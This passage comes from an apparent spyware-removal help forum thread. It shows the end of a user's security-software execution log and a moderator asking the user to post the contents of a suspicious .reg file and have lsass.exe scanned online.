[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 416 -h 608 "global\0cf2543ec46819c1ac" ]
Wed 24 - 19:37:10 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [1716]
[EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]
Wed 24 - 19:37:10 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Wed 24 - 19:37:20 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1040]
  • 0

#150
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Can you find this file:

c:\scvhost.reg

Rightclick it and open with notepad. Post the content please.

Also go to:
http://virusscan.jotti.org/
and have this file scanned:
c:\windows\system32\lsass.exe

Let me know the results.

Regards,
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP